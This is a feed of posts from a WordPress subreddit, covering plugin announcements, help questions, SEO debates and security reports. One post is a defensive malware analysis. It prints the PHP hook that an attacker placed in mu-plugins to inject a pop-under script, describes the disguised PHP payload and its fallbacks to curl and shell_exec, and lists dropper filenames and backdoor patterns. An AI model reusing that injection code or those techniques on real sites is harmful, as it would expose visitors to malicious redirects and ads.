Reading view

[PROMO] I built a free WordPress digital guest guide for hotels, B&Bs and vacation rentals

Hi everyone,

I recently published Hotelness Guest Information, a completely free WordPress plugin for hotels, B&Bs, guesthouses and vacation rentals.

The idea is simple: instead of using an external SaaS or sending guests PDFs/messages with all the property information, you can create a digital guest guide directly on your WordPress website.

It can include:

  • Wi-Fi details
  • Check-in and check-out information
  • Parking
  • House rules
  • Services and useful information
  • Local tips and recommendations
  • Multilingual content
  • Automatically generated QR code
  • Printable QR sign for rooms or reception

There’s no subscription, no external account and no hosted service required. Everything stays on the WordPress site.

It’s still a new plugin, so I’m mainly looking for feedback from WordPress developers, agencies and anyone managing hospitality websites.

WordPress.org:
https://wordpress.org/plugins/hotelness-guest-information/

If anyone tries it on a real site, I’d really appreciate hearing what you think is missing or could be improved.

submitted by /u/SwimSufficient2522
[link] [comments]
  •  

Stuck on this (ipad)

Hi, just started using wordpress on my ipad, was editing my page & i clicked something above the focus button, just to see what it does, its suppoused to hide you toolbar but how in the world do you get out of this, no undo button for the page only takes me back to my dashboard, no clue what to do, only blocked out personal info/media.
Ipad , opera browser

SOLVED

submitted by /u/riveroffallenstars
[link] [comments]
  •  

Looking for a small scale self hosted DAM (on AWS) to support website.

So we're doing a full site rebuild, and before I select hosting, I want to find a solution for hosting the myriad of pdf files that we have on the existing site. I've been looking at various solutions, but most seem to be growing and trying to be full-blown CMS solutions rather than a DAM. Bonus points if there's a WP hook where users can upload a file and it gets moved to the DAM rather than being stored on the site.

Another reason for this is I want better file management of these pdfs, and also the ability to replace the files without changing links. (Because inevitably some author will provide a deep link to their paper, and then want to change the file without changing the link).

Anyone have a reccommendation for a solution that offloads all these files so they can be better managed?

submitted by /u/OldSiteDesigner
[link] [comments]
  •  

[PROMO] I built UXPack Basic – a new WordPress plugin, looking for feedback

Hey everyone,

I've recently published UXPack Basic in the official WordPress Plugin Directory.

It's a free WordPress backup and migration plugin designed for people who want a straightforward way to back up their site and move it to another server or staging environment — without having to use a cloud service or a complicated plugin suite.

With UXPack Basic you can:

  • Create full WordPress backups (files + database)
  • Create database-only backups
  • Schedule daily, weekly or monthly backups
  • Download and manage your backup archives directly from WordPress
  • Exclude specific folders from full backups
  • Receive email notifications when backups succeed or fail
  • Monitor storage and get warnings about stale backups
  • Migrate a complete WordPress site to another server or host using the included standalone installer
  • Perform URL migration when moving a site
  • Check backup and server-related issues with the built-in diagnostic tools
  • Keep an activity log of backup operations
  • Export and import plugin settings

The basic workflow is intentionally simple:

Create backup → Download → Upload to the new server → Run installer → Migrate

There is no cloud account, license key or commercial license server required for the free version. Backups are stored locally under your WordPress installation by default.

UXPack Basic on WordPress.org

I'm the developer behind the plugin, so I'm not looking for compliments or a marketing boost. I'm mainly interested in feedback from people who actually manage WordPress sites.

I'd especially like to know:

  • Would you use a backup/migration plugin like this on a real production site?
  • Are there features you're missing?
  • Is the backup → download → migration workflow intuitive?
  • Is anything unnecessarily complicated?
  • How does it compare to the backup/migration plugins you currently use?
  • Is there anything you think UXPack Basic should not be doing?

It's still actively developed, so honest criticism is very welcome.

Thanks for taking a look!

submitted by /u/uxpack
[link] [comments]
  •  

PSA - Major security issue with the PODS plugin - CVE-2026-19598

As an agency with several hundred sites, we see vulnerabilities pop up all the time, and update them in a timely manner. We use automatic plugin updaters through Flywheel and WP Engine to do this, and generally there is no issue.

Today was different. We have the PODS plugin on about 80 of our sites, and at least 70 of them had fake administrator users added. The vulnerability patch came out on Friday and most of our sites were updated by Saturday / Sunday.

Needless to say, we've had to scramble big time to roll back sites and clean them up, removing all these users and running scans. If you use PODS, I suggest you update it as soon as you can.

This is outlined here: CVE-2026-19598

I figured people in this sub might appreciate the heads up, if they aren't already aware of this!

submitted by /u/KuntStink
[link] [comments]
  •  

Anyone else experiencing unprecedented cyber security issues recently?

I work for an IT company as a WordPress web developer and we build and manage Texas counties government websites, like tax offices, central appraisal districts etc. and we pay top dollar for the most secure server and we have multiple other security softwares on top of that. Historically, we've never really seen many security issues. One off here there however in the past 30 days, we're not only experienced the WP2Shell attacks and the BD themes compromise but now we're also experiencing a slew of other random attacks, not related to third-party issues. I've never seen anything like this before.
Is anyone else experiencing this? What is everybody else using to combat cyber attacks?

submitted by /u/kmichellex
[link] [comments]
  •  

After 8+ Years in WordPress, I’m Starting to Question Where the Industry Is Going

I’ve been working with WordPress for 8+ years, mostly around plugins, SaaS products, support, and development. For a long time, WordPress felt like a very safe career to build around.

But the last few months have made me think differently.

The small WordPress plugin market feels much harder than it used to. Getting new customers is difficult, competition is everywhere, and many plugin features that once looked like good product opportunities have now become commodities.

At the same time, AI has changed the expectations completely. Customers now expect automation, AI support, AI-powered workflows, and SaaS-style products rather than simply another WordPress plugin.

Interestingly, I’ve spent the last week thinking about this a lot. I’ve been experimenting with AI integrations, customer-support automation, SaaS ideas, and even thinking about what I could build outside the traditional WordPress ecosystem.

I still believe WordPress has a huge future. I’m not saying developers should abandon it.

But I do think experienced WordPress developers need to start thinking beyond WordPress itself.

Maybe the valuable skill isn't just knowing WordPress anymore. It's knowing how to take that experience and build SaaS products, AI tools, integrations, automation, and solutions around real business problems.

For those of you who have been in WordPress for 8+ years:

Are you also thinking about diversifying beyond WordPress, or do you still see enough opportunity in the ecosystem?

Would genuinely like to hear how other long-time WordPress developers are approaching this.

submitted by /u/sanjeevsetu
[link] [comments]
  •  

Building a Lean AMS + LMS with BuddyBoss, MemberPress & Tutor LMS. Am I missing anything?

I am scoping out a lean AMS (Association Management System) + LMS project. The strategy is to launch with free registrations to build the user base, then pivot to paid monthly subscriptions later. I want to avoid plugin bloat by relying on core pro plugins and native server features where possible.

Here is the proposed stack:

  • Hosting: Hostinger Cloud (PHP 8.1+, MariaDB, 512MB memory limit).
  • Community & UI: BuddyBoss Theme & Platform Pro.
  • Gatekeeper: MemberPress Basic (Free membership tier at launch -> Stripe/PayPal later).
  • LMS: Tutor LMS Pro (Required for the auto-generated PDF certificates).
  • Video Hosting: Bunny,net (Embeds into Tutor LMS to save local server bandwidth).
  • Email: FluentSMTP (Free) + Brevo free API tier (For transactional emails/receipts).
  • Performance: LiteSpeed Cache (Native to Hostinger servers, skipping WP Rocket).
  • Security & Backups: Wordfence (Free) + native Hostinger automated daily backups.

Is there anything critically missing from this stack? I have done wordpress dev but for this type of project and wanna make sure I am not missing anything.

submitted by /u/Unlikely-Yam2115
[link] [comments]
  •  

Getting plugin adoption and test users?

Hey plugin developers, I am curious if you have any tricks of the trade for launching a plugin and getting those elusive first 10 active installs.

We launched our plugin and got it in the WordPress marketplace about a month ago, but we still haven't had a single install. We've tried various forms of promoting on social and optimizing the content of the plugin description, but we are hitting a wall.

For context, it’s a security/bot protection plugin. We built it as a local-first alternative to cloud CAPTCHAs, so it uses invisible proof-of-work and behavioral detection to stop things like WooCommerce card testing without needing API keys.

Do people tend to pay for testers/reviewers?

How did you get your first 5-10 beta users to trust your code?

submitted by /u/cport1
[link] [comments]
  •  

Did i broke the client's WP

I was building a clients website on Wordpress, when i note the url structure of wp-admin is not right.

It was like [examplesite.com/wp/wpadmin] and the same for normal page url [examplesite.com/wp/home] i thought to fix it so i go to WP settings and in general tab i changed the wordpress and site url. When i save changes. WP got logged out and showed page not found.

What should i do, i thought i was fixing things but i made them worse.

submitted by /u/VanshGaur0
[link] [comments]
  •  

Do you think WordPress is still the best option for SEO in 2026?

There are now so many website builders, AI tools, and SaaS platforms available, but WordPress still powers a huge number of websites.

Personally, I still think WordPress has a major advantage when it comes to SEO, flexibility, and the number of tools available.

I'm also curious about PWAs. Do you think turning a WordPress website into a PWA still provides value today, or are most website owners no longer interested in features like offline access, installability, and an app-like experience?

What do you think?

submitted by /u/Much_Appointment8380
[link] [comments]
  •  

Font issue... again

My fonts will not load correctly. I don't know what's going on.

When I inspect https://healgen.com/human-health/ I see that it's using roboto condensed in the squares, but I can't find that setting anywhere. I'm using elementor and both global fonts and typography are set to roboto, bold and it just won't work.

I'm at a loss. I don't know what to do anymore and I'm ready to throw out this whole damn website.

submitted by /u/Intelligent-Nose-766
[link] [comments]
  •  

Razorpay payment captured but WooCommerce sometimes cancels order as "Unpaid" — webhook configuration keeps changing

I'm trying to figure out a strange Razorpay + WooCommerce issue and would appreciate some help from anyone who has dealt with something similar.

Setup:

WordPress / WooCommerce: 11.0.1

Razorpay WooCommerce plugin: 4.8.7

Hosting: Namecheap

Razorpay live payments

The main problem is that a customer can successfully complete a Razorpay payment, and Razorpay shows the payment as Captured, but in some cases WooCommerce later marks the order as:

"Cancelled — Unpaid order cancelled"

It doesn't happen to every order. For example, I had around 10 orders and most went through correctly, while 2 ended up cancelled.

The more concerning issue is the webhook configuration.

I had configured the webhook with the required payment events, including:

payment.authorized

payment.captured

payment.failed

order.paid

refund.created

But the webhook later reverted to only 2 of events (payment.authorised and refund.created)

I checked Razorpay's API logs and found something strange. The same webhook was repeatedly being updated:

GET /webhooks?count=10&skip=0

followed about 1 second later by:

PUT /webhooks/SYam0mYdbMI4Ns

This happened on:

15 Aug → GET → PUT

16 Aug → GET → PUT

17 Aug → GET → PUT

I did not manually edit the webhook on those dates.

When I inspected the resulting webhook configuration, payment.authorized and refund.created was enabled but payment.captured, payment.failed and order.paid were disabled.

submitted by /u/404ClicksFound
[link] [comments]
  •  

Is WordPress Really Bad for SEO?

I’ve been seeing quite a few posts recently saying that WordPress isn’t good for SEO anymore and that Next.js is a much better option.

I’m a little confused because I’ve worked with WordPress sites that rank well, especially when they’re properly optimized with good hosting, caching, clean themes, SEO plugins, schema, and solid content.

submitted by /u/Life-Initial5081
[link] [comments]
  •  

What am I doing wrong (ranking in Google)?

I'm sure this is a question this sub gets a lot, but I can't seem to find anything relevant. I started my site about three months ago as a news site for my favorite sports team. I have around 80 posts up, 150 subscribers to the Jetpack newsletter, I post every link on social media, and dozens of my articles have been linked on established sites like Yahoo, Sporting News, Athlon, and Heavy. The page views are pretty good, but none of them are coming from Google search. If I search for my articles or exact phrasing, Google returns no results. The "Discourage search engines from indexing this site" box is not checked. Almost all of my articles get a "good" Yoast SEO score.

Please note that when it comes to this sort of stuff, I am a moron, and dumbing it down would be much appreciated.

submitted by /u/Putrid-Carpenter5204
[link] [comments]
  •  

Solution for video backgrounds

Hey everyone,

I want to use a video background or two on my site. Couple of issues: Youtube has disabled the ability to hide video and channel titles from embeds, which is obviously not an ideal look. Vimeo now requires a paid membership to use videos as backgrounds.

Only solution left (that I know of) is to self-host on the wordpress domain, but that affects load speed. The video is not even that large at all, but still.

Anyone know another solution? Another video host that’s elementor and wordpress-friendly, or self hosting and embedding in a way that doesn’t affect page speed?

Thank you!

submitted by /u/amydehp
[link] [comments]
  •  

Found PopCash "stealth pop-under" malware hiding in WordPress mu-plugins — bypassed every scanner, here's how to find and remove it

What happened:

Noticed a tab-under/reverse-tabnabbing attack on my site. Disabled all plugins → problem persisted. That was the first hint it wasn't sitting in a normal plugin.

Turned out the source was in must-use plugins (/wp-content/mu-plugins/) — this folder is completely ignored when you "disable all plugins" via the wp-admin screen, so almost nobody checks it as long as the site is still loading normally.

The two files:

1. /wp-content/mu-plugins/wp-ppck-assets.php

Injects a <script> tag on every page (via wp_head, priority 1) pointing to a second file disguised as a normal theme asset:

php

add_action('wp_head', function () { if (function_exists('is_admin') && is_admin()) return; echo '<script src="/wp-content/themes/{THEME}/js/qtt-ppck-core.php" defer></script>'; }, 1); 

2. /wp-content/themes/{theme}/js/qtt-ppck-core.php

This is the actual payload. It's a PHP file pretending to be JavaScript (Content-Type: application/javascript), and behind the scenes it:

  • Makes a server-to-server request to api-js.popcash.net/getCode using a PopCash publisher UID/WID/API token
  • Passes the API response straight through to the visitor's browser
  • Includes an option "pop_fback" => "under" — literally the setting that triggers a pop-under/tab-under
  • Has fallback logic (curl → shell_exec → file_get_contents) so it keeps working regardless of how restrictive the server config is

The clever (read: annoying) part: since the malicious JS only gets pulled in via the external API call, and the local file itself looks "clean" (no obfuscation, no eval(base64_decode(...))), not a single malware scanner flagged this — not Wordfence, not Sucuri, nothing. On a pure code level it just looks like an ad network integration calling an API.

How to check for it yourself:

  1. Look in /wp-content/mu-plugins/ — this folder is NOT covered when you "disable" plugins via wp-admin
  2. Search for filenames containing ppck, qtt-, popcash, or similarly cryptic names
  3. Check your theme folder for .php files being loaded as if they were .js (called as a script but actually PHP under the hood)
  4. Run find /path/to/wordpress -type f -mtime -60 -name "*.php" to find recently modified PHP files

How to remove it:

  1. Delete both files (the mu-plugin + the fake "js" file in your theme folder)
  2. Don't assume you're done — this didn't appear out of nowhere. Someone had file access. Search all your PHP files for backdoor patterns: eval(, base64_decode(, gzinflate(, shell_exec(, assert(
  3. Check if your theme is legit/up to date — outdated or "nulled" (pirated) themes are the most common entry point for this kind of infection
  4. Rotate every password: WP admin, FTP/SFTP, database, hosting panel
  5. Update everything: core, theme, plugins

IOCs for anyone who wants to check/share:

  • Filenames: wp-ppck-assets.php, qtt-ppck-core.php
  • Endpoint: api-js.popcash.net/getCode
  • Cache key prefix: ppch-h6IzF4iRLEdZV-QX82hhpzmvxX--
  • Internal code comments referenced a "PopCash S2S Playbook" and a generator script (popcash_ops.py) — suggests this is a reusable toolkit, so probably not unique to my site. If anyone else has run into this, I'd like to hear about it.

Haven't 100% nailed down the root cause (how they got in) yet — no unknown WP users found, so my guess is stolen FTP credentials or a vulnerable/outdated theme. If anyone has tips for tracing this further through server logs, I'd appreciate it in the comments.

UPDATE: Root Cause & Entry Point Found!

Thanks to analyzing the server access logs and cross-referencing recent vulnerability databases, I've fully traced how the attacker got in and deployed the malware.

1. The Vulnerability (The Entry Point)

The site was running Thrive Themes (Thrive Architect / Thrive Visual Editor / Thrive Leads).

  • On Aug 6, 2026, CVE-2026-66694 was published — an Unauthenticated Cross-Site Scripting (XSS) / arbitrary code input vulnerability in Thrive Architect (versions <= 10.9.3.1).
  • Automated bot scanners picked up the unpatched Thrive plugin and exploited it to achieve file write access.

2. The Attack Timeline (From Server Logs)

  • 21:09:53 UTCExploit Verification: Attacker bot created a random hex file at the site root (/52faade47ac664d8d0d3.txt, ~8.6 KB) to confirm arbitrary file write privileges.
  • 21:39:19 UTCDropper Upload: Attacker POSTed to /wp-content/themes/thrive-theme/js/_w10_up.php (a hidden PHP uploader script, identical in size to wp-tmp-up.php).
  • 21:39:22 UTCVerification: Exactly 3 seconds later, a curl/7.81.0 request verified that the deployed payload (qtt-ajax-core.php / qtt-ppck-core.php) was live and returning HTTP 200.

3. Additional IOCs to Search For

If you are cleaning a site infected by this toolkit, make sure to also look for and delete:

  • Uploader / Dropper scripts: _w10_up.php, wp-tmp-up.php (often dropped inside theme /js/ or /assets/ directories).
  • Verification markers: Random 20-character hex .txt files in the WordPress root directory (e.g., 52faade47ac664d8d0d3.txt).
  • Payload aliases: qtt-ajax-core.php alongside qtt-ppck-core.php.

Takeaway & Remediation

Updating the plugin (e.g. to Thrive 10.9.3.2+) seals the vulnerability, but does NOT clean the uploaded dropper tools or backdoors. If you suspect an infection, scanning for newly created .php files and root .txt files around the date of infection is critical.

submitted by /u/ClassifiedReport
[link] [comments]
  •  

I stress-tested WordPress MCP on a 60,000-post archive

Follow-up to my 60k phpBB migration: I used the same site to stress-test WordPress MCP

Three months ago I posted about migrating 60,000 phpBB topics and 180,000 comments into WordPress with raw SQL. After that I got curious about MCP, but testing it on a clean install with 20 posts seemed pointless. Everything behaves nicely when there's nothing to break. I wanted to poke a big anthill with a stick and see what happened.

So I went back to that same site: tens of thousands of migrated posts, old forum taxonomy, years of metadata, comments, redirects, and a few leftovers from the phpBB conversion. Perfect anthill.

I connected Novamira to Codex as a remote MCP server and started with read-only checks before allowing writes.

First tests and actual useful work

Started read-only: WP/PHP/MySQL versions, active plugins, posts, settings, site structure. Confirmed, that it was actually reading live data, not just returning a green light.

I also tested AIOSEO MCP separately while Novamira stayed my general WordPress connection.

Real write test: changed the site title through the AIOSEO API, verified it landed, verified nothing else shifted. Then a safe round trip on one post, changed the SEO description, read it back, restored the original.

From there I used MCP more as a diagnostic tool: robots.txt, sitemap settings, stale social titles, an incorrect BreadcrumbList, invalid dates leaking into the sitemap index, and a lot of old posts with no focus keyphrase.

Codex wrote a tiny site-specific plugin to fix the BreadcrumbList and sitemap dates, and I kept it in mu-plugins so the fixes always load. That plugin was separate from Novamira.

Then Codex built itself a local copy of the site

Pulling tens of thousands of posts through WordPress on every pass stopped making sense.

I exported the site as XML and Codex built a local SQLite mirror from that: about 9 GB, 52,837 published posts, plus taxonomy and metadata.

That changed the workflow. Codex could query the site as data: inspect structure, sample posts, test classifications, find duplicates, pick rewrite candidates, build internal-linking plans, all without touching WordPress.

And the database stays there for whatever comes next.

Codex does the messy thinking locally. MCP does the WordPress work.

Rebuilding the old forum structure

Tens of thousands of posts sitting in old forum-style taxonomy isn't something you hand to an agent to sort live while it's simultaneously writing to WordPress.

Using the local mirror, we tested classification on about 2,000 posts, iterated the taxonomy a couple of times, then generated the full reassignment plan offline.

Only the finished plan got pushed through Novamira to staging. The agent wasn't deciding placement live, it was executing a plan that had already been checked.

Afterward I verified category counts, old vs new categories, spot-checked posts, URLs, content, authors, and comments.

Where things actually started breaking

Next up: dropping categories from the URL structure and switching permalinks to /%postname%/.

Some malformed slugs had slipped through during the original phpBB migration. They were less obvious while category names were still part of the URLs, but once the category path disappeared every slug had to stand on its own.

Codex checked the archive locally for bad characters, empty slugs, and duplicates that could collide once the category path was gone. Then we started applying the cleanup.

At around 500 records per batch, Hostinge.r started throwing 503 and 504 errors.

The interesting problem wasn't the timeout. A failed batch didn't tell me whether it had written nothing, half, or almost everything. Resending it blind wasn't safe.

After one failed large batch, 454 records still needed reconciling. Codex recalculated the current DB state first, then resumed with batches of 50, dropping to 20 when Hostinger stayed flaky.

That worked.

Final check across the archive: 0 empty, non-normalized, or duplicate slugs. Switched permalinks to /%postname%/ and did one soft rewrite flush.

At this scale, the first real limit I hit wasn't MCP. It was cheap shared hosting choking on batch size.

Second site

I also connected Novamira to another WordPress site this month. Same basic setup, same read-only baseline.

The second time was much less dramatic. First time you're fighting JSON and endpoints, second time it's mostly config.

What's still broken

New post creation mostly works, the post gets created, but the featured image doesn't attach.

Haven't isolated yet whether it's the upload step, attachment step, or specific ability.

That's next: media upload, featured image, SEO metadata, and verification, all in one reliable publish flow.

Ideally the same pipeline should generate the featured image and metadata too, instead of me adding them manually afterward.

I still wouldn't run the riskier parts of this directly against production. Staging and backups are cheap compared with finding out what an agent just did to 60,000 posts.

submitted by /u/dzimazilla
[link] [comments]
  •  

How do you handle moving WordPress sites between local/staging/production?

I've been using the likes of All-in-One Migration for a long time, but I don't love how much server space it eats up just to generate the export, and it throws errors often enough to be annoying.

I'm not against the terminal, it's powerful, but I'm not fluent enough that I don't end up googling or asking AI for the right command most times I use it.

Curious how other people handle this, particularly if you're running more than a handful of client sites (say 10+).

  • What's your actual workflow for pushing and pulling files and the database between environments?
  • What do you use to keep everything updated across multiple sites — core, plugins, themes?
  • Has a migration or update ever gone wrong on a live site? What happened?
  • Are you on the command line for most of this, or do you avoid it where you can?
submitted by /u/poppawinz
[link] [comments]
  •  

Help Post

I have an issue with 'contact' element in Header builder of Porto theme customise accessed via appearance. The phone icon and text need to be closer but apparently, I am unable to do so. Could anyone help me please.

submitted by /u/Easy-Ad-3135
[link] [comments]
  •  
❌